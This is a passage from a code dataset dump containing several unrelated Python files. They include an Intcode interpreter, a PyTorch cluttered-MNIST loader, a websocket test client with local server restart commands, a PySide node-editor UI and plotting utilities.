realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send, default_receiver\n from gmod import player\n\n ply = player.get_by_userid(1)\n pickled1 = pickle.dumps((1,), pickle.HIGHEST_PROTOCOL)\n pickled2 = pickle.dumps((2,), pickle.HIGHEST_PROTOCOL)\n\n with default_receiver(ply):\n send('spam', 1)\n send('eggs', 2)\n\n g.net.Start.assert_has_calls([call('spam'), call('eggs')])\n g.net.WriteUInt.assert_has_calls([call(len(pickled1), 32), call(len(pickled2), 32)])\n g.net.WriteData.assert_has_calls([call(pickled1, len(pickled1)), call(pickled2, len(pickled2))])\n g.net.Send.assert_has_calls([call(ply), call(ply)])\n\n def test_wrong_type(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send, default_receiver\n\n with self.assertRaises(ValueError):\n with default_receiver(1):\n send('spam', 1)\n","sub_path":"tests/tests/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96836223","text":"import os\nimport cv2\nimport torch\nimport numpy as np\n\nfrom PIL import Image\nfrom torchvision import datasets, transforms\nfrom torch.utils.serialization import load_lua\n\nfrom datasets.utils import create_loader, normalize_train_test_images\n\ndef load_cluttered_mnist(path, segment='train'):\n full = load_lua(os.path.join(path, '%s.t7'%segment))\n data = [t[0].unsqueeze(1) for t in full]\n labels = []\n for t in full:\n _, index = torch.max(t[1], 0)\n labels.append(index.unsqueeze(0))\n\n return [torch.cat(data).type(torch.FloatTensor).numpy(),\n torch.cat(labels).squeeze().type(torch.LongTensor).numpy()]\n\n\nclass ClutteredMNISTDataset(torch.utils.data.Dataset):\n def __init__(self, path, segment='train', transform=None, target_transform=None):\n\n self.path = os.path.expanduser(path)\n self.transform = transform\n self.target_transform = target_transform\n self.segment = segment.lower().strip() # train or test or val\n\n # load the images and labels\n self.imgs, self.labels = self._load_from_path()\n\n def _load_from_path(self):\n # load the tensor dataset from it's t7 binaries\n imgs, labels = load_cluttered_mnist(self.path, segment=self.segment)\n print(\"imgs_%s = \"%self.segment, imgs.shape,\n \" | lbl_%s = \"%self.segment, labels.shape)\n return imgs, labels\n\n def __getitem__(self, index):\n img, target = self.imgs[index], self.labels[index]\n img = Image.fromarray(np.uint8(img.squeeze()*255))\n #img = np.transpose(img, (1, 2, 0))\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n #img = np.transpose(img, (1, 2, 0))\n #img = Image.fromarray(np.uint8(img*255))\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n\nclass ClutteredMNISTLoader(object):\n def __init__(self, path, batch_size, train_sampler=None, test_sampler=None,\n transform=None, target_transform=None, use_cuda=1, **kwargs):\n # first get the datasets\n train_dataset, test_dataset = self.get_datasets(path, transform,\n target_transform)\n\n # normalize the images\n # train_dataset.imgs, test_dataset.imgs = normalize_train_test_images(\n # train_dataset.imgs, test_dataset.imgs\n # )\n\n # build the loaders\n kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n self.train_loader = create_loader(train_dataset,\n train_sampler,\n batch_size,\n shuffle=True if train_sampler is None else False,\n **kwargs)\n\n self.test_loader = create_loader(test_dataset,\n test_sampler,\n batch_size,\n shuffle=False,\n **kwargs)\n\n self.output_size = 10\n self.batch_size = batch_size\n self.img_shp = [1, 100, 100]\n\n @staticmethod\n def get_datasets(path, transform=None, target_transform=None):\n if transform:\n assert isinstance(transform, list)\n\n transform_list = []\n if transform:\n transform_list.extend(transform)\n\n transform_list.append(transforms.ToTensor())\n train_dataset = ClutteredMNISTDataset(path, segment='train',\n transform=transforms.Compose(transform_list),\n target_transform=target_transform)\n test_dataset = ClutteredMNISTDataset(path, segment='test',\n transform=transforms.Compose(transform_list),\n target_transform=target_transform)\n return train_dataset, test_dataset\n","sub_path":"mnist_cluttered.py","file_name":"mnist_cluttered.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"337698261","text":"#!/usr/local/bin/python3\n\nimport sys\nfrom io import StringIO\nfrom itertools import permutations\n\nprojectInput = \"3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5\"\nbasePhaseSettings = ['9','8','7','6','5']\n\n# Turn on logging (printed to STDERR)\nlogLevel = 2\n\n\nvalidInstructions = [1,2,3,4,5,6,7,8,99]\n\n\ndef printToLog(level, out):\n\tif level <= logLevel :\n\t\tprint(out, file = sys.stderr)\n\treturn\n\n\nclass IntcodeComputer:\n\t\n\tdef __init__ (self, program):\n\t\t\"\"\" Establish execution program \"\"\"\n\t\n\t\tself.programCode = program.split(\",\")\n\t\tself.currentIndex = 0\n\t\tself.steps = 0\n\t\tself.inputValues = []\n\t\tself.outputValues = []\n\t\tself.manualInput = True\n\t\tself.manualOutput = True\n\t\t\n\tdef updateLocation(self, location, value):\n\t\tself.programCode[location] = str(value)\n\t\treturn\n\t\t\n\tdef readFromFile(self, inputFileName):\n\t\tself.manualInput = False\n\t\tself.inFile = open(inputFileName, 'r')\n\n\n\tdef getParameters(self, number, mask):\n\t\t\"\"\" Get the parameters based on 'number' \"\"\"\n\t\tstrParameters = self.programCode[self.currentIndex+1 : self.currentIndex + number + 1]\n\t\tparameters = list(map(lambda x : int(x), strParameters))\n\t\tparms = self.evaluateParms(parameters, mask)\n\t\tprintToLog(1, \"\\t\\tReturn Parameters: {0}\".format(parms))\n\t\treturn parms\n\t\t\n\tdef evaluateParms(self, parms, mask):\n\t\t\"\"\" Evaluate Parms base on Mask and return real Parameter Values \"\"\"\n\t\t\n\t\tprintToLog(1, \"\\t\\tPassed Parameters: {0}\".format(parms))\n\t\treturnParms=[]\n\t\tfor i in range(len(parms)-1):\n\t\t\tmaskCode = mask[0]\n\t\t\tparmValue = parms[i]\n\t\t\tif maskCode == '0':\n\t\t\t\tprintToLog(2, \"\\t\\tGetting Position Value {0} from Position {1}\".format(self.programCode[parmValue], parmValue))\n\t\t\t\treturnParms.append(int(self.programCode[parmValue]))\n\t\t\telif maskCode == '1':\n\t\t\t\tprintToLog(2, \"\\t\\tGetting Immediate Value {0} \".format(parmValue))\n\t\t\t\treturnParms.append(parmValue)\n\t\t\telse:\n\t\t\t\tprintToLog(0, \"*** ILLEGAL MASK {0} ***\".format(mask))\n\t\t\t\texit()\n\t\t\tmask = mask[1:]\n\t\t\t\t\t\n# \t\tAppend Location store\n\t\tmaskCode = mask[0]\n\t\treturnParms.append(int(parms[-1]))\n \t\t\t\n\t\treturn returnParms\n\t\t\t\t\n\t\t\n\tdef getInstruction(self):\n\t\t\"\"\" Get the next instruction code\"\"\"\n\t\tnextInstruction = self.programCode[self.currentIndex].zfill(5)\n\t\tprintToLog(1,\"Received Instruction Code {1} from Position {0}\".format(self.currentIndex, nextInstruction))\n\t\tmask = nextInstruction[0:3][::-1]\n\t\tinstruction = int(nextInstruction[3:5])\n\t\treturn instruction, mask\n\t\t\n\tdef returnCode(self, location):\n\t\treturn int(self.programCode[location])\n\t\t\n\tdef execCode(self):\n\t\t\"\"\" Execute Code \"\"\"\n\t\n\t\twhile True:\n\t\t\n\t\t\tself.steps += 1\n\t\t\tprintToLog(1,\"--------------------------------------------------\")\n\t\t\tprintToLog(3, self.programCode)\n\t\t\tinstruction, mask = self.getInstruction()\t\t\n\t\t\tprintToLog(2, \"\\tExecuting Code: {0} with Mask: {1}\".format(instruction, mask))\n\t\n\t\t\tif instruction not in validInstructions:\n\t\t\t\tprint(0, \"** Illegal Instruction Code: {0} at Position: {1} and Step: {2}\".format(instruction, self.currentIndex, self.steps))\n\t\t\t\texit()\n\t\t\n\t\t\tif instruction == 1:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tx, y, outputLocation = parms\n\t\t\t\ta = x + y\n\t\t\t\tself.updateLocation(outputLocation, a)\n\t\t\t\tprintToLog(2, \"\\tExecute {0} + {1} with result: {2} and stored in Position: {3}\".format(x,y, a, outputLocation))\n\t\t\t\tself.currentIndex += 4\n\n\t\t\t\n\t\t\telif instruction == 2:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tx, y, outputLocation = parms\n\t\t\t\ta = x * y\n\t\t\t\tself.updateLocation(outputLocation, a)\n\t\t\t\tprintToLog(2, \"\\tExecute {0} * {1} with result: {2} and stored in Position: {3}\".format(x,y, a, outputLocation))\n\t\t\t\tself.currentIndex += 4\n\t\t\t\t\n\t\t\telif instruction == 3:\n\t\t\t\tparms = self.getParameters(1, mask)\n\t\t\t\toutputLocation = parms[-1]\n\t\t\t\tx = input()\n\t\t\t\tself.updateLocation(outputLocation,x)\n\t\t\t\tprintToLog(2, \"\\tReceived Input {0} and stored in Position: {1}\".format(x,outputLocation))\n\t\t\t\tself.currentIndex += 2\n\t\t\t\n\t\t\telif instruction == 4:\n\t\t\t\tparms = self.getParameters(1, mask)\n\t\t\t\tif mask[0] == '0':\n\t\t\t\t\tinputLocation = parms[0]\n\t\t\t\t\tx = self.returnCode(inputLocation)\n\t\t\t\telse:\n\t\t\t\t\tx = int(parms[0])\n\t\t\t\t\tinputLocation = \"N/A\"\n\t\t\t\tprint(x)\n\t\t\t\tprintToLog(2, \"\\tPrinted value: {0} from Position: {1}\".format(x, inputLocation))\n\t\t\t\tself.currentIndex += 2\n\n\t\t\telif instruction == 5:\n\t\t\t\tparms = self.getParameters(2, mask)\n\t\t\t\tvalueToCheck = parms[0]\n\t\t\t\tif mask[1] == '0':\n\t\t\t\t\tnewLocation = self.programCode[parms[1]]\n\t\t\t\telse:\n\t\t\t\t\tnewLocation = parms[1]\n\t\t\t\tif valueToCheck:\n\t\t\t\t\tself.currentIndex = int(newLocation)\n\t\t\t\telse: \n\t\t\t\t\tnewLocation = self.currentIndex + 3\n\t\t\t\tprintToLog(2, \"\\tValue {0} is {1}, jumping to Position: {2}\".format(valueToCheck, (valueToCheck != 0), newLocation))\n\t\t\t\tself.currentIndex = int(newLocation)\n\t\t\t\t\n\t\t\telif instruction == 6:\n\t\t\t\tparms = self.getParameters(2, mask)\n\t\t\t\tvalueToCheck = parms[0]\n\t\t\t\tif mask[1] == '0':\n\t\t\t\t\tnewLocation = self.programCode[parms[1]]\n\t\t\t\telse:\n\t\t\t\t\tnewLocation = parms[1]\n\t\t\t\tif not valueToCheck:\n\t\t\t\t\tself.currentIndex = newLocation\n\t\t\t\telse: \n\t\t\t\t\tnewLocation = self.currentIndex + 3\n\t\t\t\tprintToLog(2, \"\\tValue {0} is {1}, jumping to Position: {2}\".format(valueToCheck, not (valueToCheck != 0), newLocation))\n\t\t\t\tself.currentIndex = int(newLocation)\n\n\t\t\telif instruction == 7:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tvalueToCheck1, valueToCheck2, outputLocation = parms\n\t\t\t\tresult = (valueToCheck1 < valueToCheck2)\n\t\t\t\tself.updateLocation(outputLocation, int(result))\n\t\t\t\tprintToLog(2, \"\\tValue {0} > {1} is {2}, storing {3} in Position: {2}\".format(valueToCheck1, valueToCheck2, result, int(result)))\n\t\t\t\tself.currentIndex += 4\n\t\t\t\n\t\t\telif instruction == 8:\n\t\t\t\tparms = self.getParameters(3, mask)\n\t\t\t\tvalueToCheck1, valueToCheck2, outputLocation = parms\n\t\t\t\tresult = (valueToCheck1 == valueToCheck2)\n\t\t\t\tself.updateLocation(outputLocation, int(result))\n\t\t\t\tprintToLog(2, \"\\tValue {0} > {1} is {2}, storing {3} in Position: {2}\".format(valueToCheck1, valueToCheck2, result, int(result)))\n\t\t\t\tself.currentIndex += 4\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\telse:\n\t\t\t\tprintToLog(1, \"BREAK-BREAK-BREAK\")\n\t\t\t\t# Executing Code 99\n\t\t\t\tbreak\n\t\t\t\n\t\treturn\n\t\t\ndef checkInputs(phaseSettingsSeed):\n\n\tampInputSignal = '0'\n\t\n\tfor phaseSetting in phaseSettingsSeed:\n\t\t# reset the stdin/STDOUT\n\t\tmyStdIn = StringIO()\n\t\tmyStdOut = StringIO()\n\t\t\n\t\t# Seed the input feed\n\t\tsys.stdout = myStdIn\n\t\tprint(str(phaseSetting))\n\t\tprint(str(ampInputSignal)) \n\t\tprintToLog(1, \"\\n===================================================\")\n\t\tprintToLog(1, \"Excecuting Program with Phase {0} and Amp {1}\".format(phaseSetting, ampInputSignal))\n\t\t\t\n\t\t# Reset Input File and redirect Stdin\n\t\tsys.stdin = myStdIn\t\n\t\tmyStdIn.seek(0)\n\t\tsys.stdout = myStdOut\n\t\t\n\t\t# Execute the program\n\t\tcomputer=IntcodeComputer(projectInput)\n\t\tcomputer.execCode()\n\t\t\n\t\t# Now get the output \t\t\n\t\tmyStdOut.seek(0)\n\t\tampInputSignal = str(myStdOut.getvalue().split()[0]).zfill(5)\n\t\tprintToLog(1, \"Amp Out Signal: {0}\".format(ampInputSignal))\n\t\tmyStdIn.flush()\n\t\tmyStdOut.flush()\n\t\t\n\treturn ampInputSignal\n\ndef main():\n\t\n\toldStdOut = sys.stdout \n\toldStdIn = sys.stdin\n\t\n\tphaseSettingsArray = list(permutations(basePhaseSettings, len(basePhaseSettings)))\n\tbestOutput = 0\n\tbestCombo = []\n\n\t# Test only single permutation\n\tbestOutput = int(checkInputs(basePhaseSettings))\n\n# \tfor phaseSetting in phaseSettingsArray:\n# \t\tampOutput = int(checkInputs(phaseSetting))\n# \t\tif ampOutput > bestOutput:\n# \t\t\tbestOutput = ampOutput\n# \t\t\tbestCombo = phaseSetting\n\n\n\t\n\tsys.stdout = oldStdOut\n\tsys.stdin = oldStdIn\n\n\tprint(bestOutput)\t\n\tprintToLog(1, bestCombo)\n\t\n\t\t\t\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"2019/Day7-2.py","file_name":"Day7-2.py","file_ext":"py","file_size_in_byte":7589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303432859","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\nname = '屈星哲'\nnameLenght = len(name)\nprint(\"name = \" , name , \"长度:\" , nameLenght)\n\n\ntipsContent = '你好,\\t%s\\t,这个月你还没给我们发\\t%s\\t,每人\\t%d\\t个'%('jobs',\"月饼\",5)\nprint(tipsContent)\n\ndate = '%2d-%05d' % (3,1)\nprint(date)\n\n\n\ns1 = 72\ns2 = 74\nr = (74 - 72) / 72 * 100\nprint('%.1f %%' % r)\n\ns = u'Python-中文'\nprint(s)","sub_path":"Python/Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140392500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 11 14:55:39 2019\n\n@author: Stella Galamo\n\"\"\"\n\nfrom Main import Main\nfrom surprise import SVD, SVDpp\nfrom surprise import NormalPredictor\nfrom Evaluator import Evaluator\n\nimport random\nimport numpy as np\n\ndef LoadSpecialistData():\n main = Main()\n print(\"Loading ratings...\")\n data = main.loadData()\n print(\"\\nComputing specialists popularity ranks so we can measure novelty later...\")\n rankings = main.getPopularityRanks\n return (main, data, rankings)\n\nnp.random.seed(0)\nrandom.seed(0)\n\n# Load up common data set for the recommender algorithms\n(main, evaluationData, rankings) = LoadSpecialistData()\n\n# Construct an Evaluator to, you know, evaluate them\nevaluator = Evaluator(evaluationData, rankings)\n\n# SVD\nSVD = SVD()\nevaluator.AddAlgorithm(SVD, \"SVD\")\n\n# SVD++\nSVDPlusPlus = SVDpp()\nevaluator.AddAlgorithm(SVDPlusPlus, \"SVD++\")\n\n# Just make random recommendations\nRandom = NormalPredictor()\nevaluator.AddAlgorithm(Random, \"Random\")\n\n# Fight!\nevaluator.Evaluate(False)\n\nevaluator.SampleTopNRecs(main)","sub_path":"RecommenderSystem/MatrixFactorization/SVDBakeOff.py","file_name":"SVDBakeOff.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219325213","text":"#!/usr/bin/env python\n# coding: utf-8\n# Copyright (c) 2011-2014, Sylvain Hellegouarch, Abram Hindle\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of ws4py nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n# pip install ws4py\n# pip install gevent\n\nfrom gevent import monkey\nmonkey.patch_all()\nimport os\nimport gevent\nfrom ws4py.client.geventclient import WebSocketClient\nimport json\n\n\nworld = dict()\n# set this to something sane \ncalls = 3000\n# ugh there's too much output? Well drop calls down\n# calls = 100\n\ndef utf8(utf8bytes):\n return utf8bytes.decode(\"utf-8\")\n\nclass WorldClient(WebSocketClient):\n def opened(self):\n self.count = 0\n if (self.name is None):\n self.name = \"\"\n\n def send_new_entity(self,i):\n entity = \"X\"+str(i)\n data = {'x':i,'y':i}\n world[entity] = data\n packet = { entity : data }\n self.send(json.dumps(packet))\n print(\"Sent %s\" % entity)\n\n def closed(self, code, reason):\n print((\"Closed down %s \" % self.name, code, reason))\n\n def receive_my_message(self,m):\n print(\"RECV %s \" % m)\n w = json.loads(utf8(m.data))\n kcnt = 0\n for key in w:\n if (key in world):\n assert world[key] == w[key]\n world[key] = w[key]\n kcnt += 1\n if (kcnt > 0):\n self.count += 1\n if (self.count >= calls):\n self.close(reason='Bye bye')\n\n def incoming(self):\n while self.count < calls:\n m = self.receive()\n print(\"Incoming RECV %s %s \" % (self.name,m))\n if m is not None:\n self.receive_my_message( m )\n else:\n return\n\n def outgoing(self):\n for i in range(0,calls):\n self.send_new_entity(i)\n \nif __name__ == '__main__':\n try:\n os.system(\"kill -9 $(lsof -t -i:8000)\");\n os.system(\"bash run.sh &\");\n print(\"Sleeping 3 seconds\")\n gevent.sleep(3)\n ws = WorldClient('ws://127.0.0.1:8000/subscribe', protocols=['http-only', 'chat'])\n ws2 = WorldClient('ws://127.0.0.1:8000/subscribe', protocols=['http-only', 'chat'])\n ws.daemon = False\n ws2.daemon = False\n ws.name = \"Reader/Writer\"\n ws2.name = \"Reader\"\n ws.connect() \n ws2.connect() \n ''' what we're doing here is that we're sending new entities and getting them\n back on the websocket '''\n greenlets = [\n gevent.spawn(ws.incoming),\n gevent.spawn(ws.outgoing),\n ]\n gws2 = gevent.spawn(ws2.incoming)\n gevent.joinall(greenlets)\n ws2.close()\n gws2.join(timeout=1)\n # here's our final test\n print(\"Counts: %s %s\" % (ws.count , ws2.count))\n assert ws.count == calls, (\"Expected Responses were given! %d %d\" % (ws.count, calls))\n assert ws2.count >= (9*calls/10), (\"2nd Client got less than 9/10 of the results! %s\" % ws2.count)\n print(\"Looks like the tests passed!\")\n finally:\n #except KeyboardInterrupt:\n ws.close()\n ws2.close()\n gevent.sleep(1)\n os.system(\"kill -9 $(lsof -t -i:8000)\");\n print(\"Sleeping 2 seconds\")\n gevent.sleep(2)\n","sub_path":"freetests.py","file_name":"freetests.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515624531","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n Author: kun.wang\n Create: 2015-06-24\n\nusing: PySide\n\"\"\"\nimport sys\n\n# import PySide.QtCore as QtCore\nimport PySide.QtGui as QtGui\n\n# from task_node import TaskNodePort\nfrom task_node import TaskNode\nfrom task_node import TaskNodeConnection\nfrom task_node import NodesEditor\n\n# import honey\n# import honey_context as hc\n\n\nclass TaskWorkFlow(QtGui.QWidget):\n \"\"\"工作流设计界面,包含NodesEditor跟GraphicView\"\"\"\n\n def __init__(self, parent=None):\n super(TaskWorkFlow, self).__init__(parent)\n self.scene = NodesEditor()\n self.view = QtGui.QGraphicsView(self.scene)\n self.view.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(200, 200, 200)))\n self.main_layout = QtGui.QVBoxLayout()\n self.main_layout.setContentsMargins(0, 0, 0, 0)\n self.setLayout(self.main_layout)\n self.main_layout.addWidget(self.view)\n\n def clear(self):\n self.scene.clear()\n\n def add_node(self, node):\n pass\n\n def add_connector(self, conn):\n pass\n\n def add_test(self):\n model = TaskNode(\"Model\")\n model.add_port(\"Maya\")\n port_a = model.add_port(\"Houdini\", True)\n self.scene.addItem(model)\n\n model2 = TaskNode(\"Texture\")\n port_b = model2.add_port(\"Maya\")\n model2.add_port(\"Houdini\", True)\n self.scene.addItem(model2)\n model2.setPos(200, 100)\n\n conn = TaskNodeConnection()\n conn.set_start_port(port_a)\n conn.set_end_port(port_b)\n conn.update_path()\n self.scene.addItem(conn)\n\n model3 = TaskNode(\"Rigging\")\n model3.add_port(\"Abc\")\n model3.add_port(\"Ass\", True)\n self.scene.addItem(model3)\n model3.setPos(360, -100)\n\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n\n a = TaskWorkFlow()\n a.add_test()\n a.resize(900, 600)\n a.show()\n\n sys.exit(app.exec_())\n","sub_path":"OpenCGPipeline/Honey/project_ui/task_ui/task_workflow.py","file_name":"task_workflow.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"347874663","text":"import ROOT\n\nimport sys\nimport numpy as np\n\nfrom toolbox import printer\nfrom toolbox import plotSetup as ps\nimport hpUtil\nfrom Setters import HSSetters\n\nclass HistogramSetup(HSSetters):\n def getStackTemplatesInOrder(self, templates):\n '''\n loop over all templates and find out if they are to be put into the stack \n then order them by stacking order defined by integral or the plottingOrder\n '''\n stackTemplates = []\n # loop over templates and get all that are to be in stack\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if proc in self.plotAsLine: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n stackTemplates.append(proc)\n \n # get integral values of templates\n stackIntegrals = {p: templates[p].nom.Integral() for p in stackTemplates}\n\n # sort by integral (biggest first)\n orderedTemplates = []\n for proc in sorted(stackIntegrals, key=stackIntegrals.get, reverse=True):\n if proc in self.plottingOrder: continue\n orderedTemplates.append(proc)\n\n # reverse the order if option is set\n if self.highestIntegralOnTop:\n orderedTemplates.reverse()\n\n # append the processes predefined by plottingOrder\n orderedTemplates+=self.plottingOrder\n\n # returns list of processes. first process is lowest in stack\n return orderedTemplates\n\n def getLineTemplates(self, templates, stackIntegral):\n '''\n get all templates that are to be plot as lines with their scaling factor\n '''\n lineTemplates = {}\n # loop over templates and get all that are to be lines\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n if proc in self.plotAsLine:\n lineTemplates[proc] = self.plotAsLine[proc]\n if proc in self.plotAsBoth:\n lineTemplates[proc] = self.plotAsBoth[proc]\n\n lineHistograms = {}\n lineErrors = {}\n for proc in lineTemplates:\n lineHistograms[proc] = templates[proc].nom.Clone()\n scale = lineTemplates[proc]\n if scale == -1:\n scale = stackIntegral/(lineHistograms[proc].Integral()+1e-10)\n lineTemplates[proc] = scale\n lineHistograms[proc].Scale(scale)\n\n lineErrors[proc] = {}\n if self.scaleLineErrors:\n errorScale = scale\n else:\n errorScale = 1.\n # loop over systematics \n for sys in templates[proc].upValues:\n lineErrors[proc][sys] = ROOT.TGraphAsymmErrors(lineHistograms[proc].Clone())\n for iBin in range(lineHistograms[proc].GetNbinsX()):\n lineErrors[proc][sys].SetPointEYlow( \n iBin, templates[proc].dnValues[sys][iBin]*errorScale)\n lineErrors[proc][sys].SetPointEYhigh(\n iBin, templates[proc].upValues[sys][iBin]*errorScale)\n lineErrors[proc][sys].SetPointEXlow( \n iBin, lineHistograms[proc].GetBinWidth(iBin+1)/2.)\n lineErrors[proc][sys].SetPointEXhigh( \n iBin, lineHistograms[proc].GetBinWidth(iBin+1)/2.)\n\n '''\n lineTemplates: {procName: lineScale}\n lineHistograms: {procName: template}\n lineErrors: {procName: {sysGroup: errorband}}\n '''\n return lineTemplates, lineHistograms, lineErrors\n\n def getData(self, templates):\n '''\n get data template based on either real data or pseudo date\n also edits the uncertainties of pseudo data to be sqrt(N)\n '''\n if self.realData:\n printer.printInfo(\"\\tloading real data histogram\")\n data = templates[\"data_obs\"].nom.Clone()\n return data\n\n else:\n printer.printInfo(\"\\tloading pseudo data histogram\")\n # get list of pseudodata processes\n processes = self.pseudodataProcesses\n # if no information is given just use the background\n if processes is None:\n processes = []\n for proc in templates:\n if templates[proc].isData: continue\n if templates[proc].partOfMerged: continue\n if proc in self.plotAsLine: continue\n if not self.includeOnly is None:\n if not proc in self.includeOnly:\n continue\n processes.append(proc)\n\n # build pseudodata histogram\n pseudodata = None\n for proc in processes:\n if pseudodata is None:\n pseudodata = templates[proc].nom.Clone()\n else:\n pseudodata.Add(templates[proc].nom.Clone())\n\n # set poissonian bin error\n for iBin in range(pseudodata.GetNbinsX()):\n pseudodata.SetBinError(iBin+1, np.sqrt(pseudodata.GetBinContent(iBin+1)))\n return pseudodata\n\n def stackTemplates(self, templates, stackTemplates):\n '''\n stack templates for plotting\n also load the uncertainty bands for the stack\n '''\n stackedHistograms = []\n stackResUp = {}\n stackResDn = {}\n \n # build histogram stacks\n stack = None\n tempTemplates = [t for t in stackTemplates]\n for proc in tempTemplates:\n printer.printInfo(\"\\tstacking: \"+proc)\n if not proc in templates:\n printer.printWarning(\n \"\\tprocess {} is not defined\".format(proc))\n stackTemplates.pop(stackTemplates.index(proc))\n continue\n # adding template to stakc\n if stack is None:\n stack = templates[proc].nom.Clone()\n else:\n stack.Add(templates[proc].nom.Clone())\n stackedHistograms.append(stack.Clone())\n\n # looping over defined systematics\n for sys in templates[proc].upValues:\n if not sys in stackResUp:\n stackResUp[sys] = np.zeros(templates[proc].nom.GetNbinsX())\n if not sys in stackResDn:\n stackResDn[sys] = np.zeros(templates[proc].nom.GetNbinsX())\n # stat uncertainty is directly inferred from binerror of stack\n if sys == \"stat\":\n for iBin in range(templates[proc].nom.GetNbinsX()):\n stackResUp[sys][iBin] = stack.GetBinError(iBin+1)\n stackResDn[sys][iBin] = stack.GetBinError(iBin+1)\n continue\n # looping over bins of other systs and adding them lin/quad\n for iBin in range(templates[proc].nom.GetNbinsX()):\n if self.sumSystsBetweenProcessesLinear:\n stackResUp[sys][iBin] += templates[proc].upValues[sys][iBin]\n stackResDn[sys][iBin] += templates[proc].dnValues[sys][iBin]\n else:\n stackResUp[sys][iBin] = np.sqrt(\n stackResUp[sys][iBin]**2 + templates[proc].upValues[sys][iBin]**2)\n stackResDn[sys][iBin] = np.sqrt(\n stackResDn[sys][iBin]**2 + templates[proc].dnValues[sys][iBin]**2)\n\n # build TAsymErrorGraphs\n stackErrors = {}\n for sys in stackResDn:\n stackErrors[sys] = ROOT.TGraphAsymmErrors(stack.Clone())\n for iBin in range(stack.GetNbinsX()):\n stackErrors[sys].SetPointEYlow( iBin, stackResDn[sys][iBin])\n stackErrors[sys].SetPointEYhigh(iBin, stackResUp[sys][iBin])\n stackErrors[sys].SetPointEXlow( iBin, stack.GetBinWidth(iBin+1)/2.)\n stackErrors[sys].SetPointEXhigh(iBin, stack.GetBinWidth(iBin+1)/2.)\n\n return stackedHistograms, stackErrors\n \n def getStackIntegral(self, stackedHistograms):\n '''\n get integral of stack and flag if there even is a stack\n '''\n hasHistStack = False\n stackIntegral = 1.\n if len(stackedHistograms) > 0:\n stackIntegral = stackedHistograms[-1].Integral()\n hasHistStack = True\n \n return hasHistStack, stackIntegral\n\n def getPlotRange(self, stackedHistograms, lineHistograms):\n ''' \n determine x-axis plot range\n '''\n yMax = 0.\n yMinMax = 1e10\n for h in [stackedHistograms[-1]]+lineHistograms.values():\n yMax = max(yMax, h.GetBinContent(h.GetMaximumBin()))\n yMinMax = min(yMinMax, h.GetBinContent(h.GetMaximumBin()))\n if self.logY: \n return yMinMax/1000+1e-10, yMax*10\n else:\n return 1e-2, yMax*1.5\n\n def getDataInfo(self, histStack = True):\n '''\n get info if data is used and label for data\n '''\n # determine if data is used\n # data will not be used of there is no stack of histograms\n useData = ((not self.plotBlind) and histStack)\n\n # get data label \n if 